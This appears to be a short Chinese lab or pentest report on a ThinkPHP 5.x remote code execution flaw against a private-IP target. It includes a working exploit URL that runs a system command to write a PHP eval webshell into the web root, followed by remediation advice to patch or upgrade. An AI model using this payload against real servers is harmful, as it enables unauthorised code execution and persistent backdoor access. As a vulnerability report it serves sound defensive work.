#Thinkphp5.x漏洞
系统类型:linux
漏洞类型:Thinkphp5.x漏洞
漏洞URL:http://192.168.1.246/public/
漏洞详情:
已知真实IP是192.168.1.246,扫后台
然后扫这两个网页是否存在漏洞
上传一句话木马到靶机
代码:
http://192.168.1.246/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%22%3C?php%20@eval($_POST[%27123456%27]);?%3E%22%20%3E/var/www/html/public/123.php
再用蚁剑连接靶机
漏洞危害:
恶意攻击者可以通过一句话木马对靶机进行攻击,他们可以越权获得靶机的root权限,对文件进行篡改。
修复建议:
1.建议在靶机上添上Thinkphp v5.0.x 补丁,Thinkphp v5.1.x 补丁.
Thinkphp v5.0.x 补丁 下载地址: https://github.com/top-think/framework/com…
Thinkphp v5.1.x 补丁 下载地址: https://github.com/top-think/framework/com…
2.将靶机Thinkphp框架升级